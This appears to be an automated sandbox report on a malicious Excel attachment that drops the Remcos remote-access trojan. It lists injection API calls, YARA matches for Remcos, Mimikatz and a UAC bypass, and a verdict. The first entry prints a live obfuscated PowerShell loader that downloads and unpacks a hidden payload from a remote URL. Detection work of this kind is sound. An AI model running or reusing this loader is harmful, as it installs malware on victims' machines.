                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00401806 NtdllDefWindowProc_W
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004016FD NtdllDefWindowProc_A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE8998352E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_000007FE898856B0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_000007FE89953409
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_000007FE8995133E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043706A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00414005
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043E11C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004541D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004381E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00446270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043E34B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004533AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0042742E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00437566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043E5A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004387F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043797E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004339D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0044DA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00427AD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041DBF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00427C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00437DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00435EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0043DEED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00426E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044D6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_004476F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044081D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00414957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_004079EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00407AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044AA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00412AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00404B74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00404B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0044BBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00404BE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00404C76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00415CFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00416D72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00446D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00446D8B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00406E8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00405038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0041208C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004050A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0040511A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0043C13A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004051AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00449300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0040D322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0044A4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0043A5AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00413631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00446690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0044A730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004398D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_004498E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0044A886
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0043DA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00438D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00449ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_0041FE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 23_2_00430F54
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_004050C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_004014AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00405133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_004051A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00401246
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_0040CA46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00405235
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_004032C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00401689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 26_2_00402F60
                Source: RFQ_0230909024SEPT.xla.xlsx | OLE indicator, VBA macros: true
                Source: RFQ_0230909024SEPT.xla.xlsx | Stream path 'MBD000E0292/\x1Ole' : https://zeep.ly/yDfvh>$k0q3CQ,I@Ghhw\k<7YS,Css*12I|-eQ~(SUsqf=@*,V`&3Vm5B4z?:1gg7:?x}wgsf$nlC2Nu]]vmHG2hG(3C.Jv?vgvwsq4zd3tpSp8XO{^ O7?E~8il
                Source: B3930000.0.dr | Stream path 'MBD000E0292/\x1Ole' : https://zeep.ly/yDfvh>$k0q3CQ,I@Ghhw\k<7YS,Css*12I|-eQ~(SUsqf=@*,V`&3Vm5B4z?:1gg7:?x}wgsf$nlC2Nu]]vmHG2hG(3C.Jv?vgvwsq4zd3tpSp8XO{^ O7?E~8il
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
                Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: bhv1E0C.tmp.21.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLSX@38/28@5/5
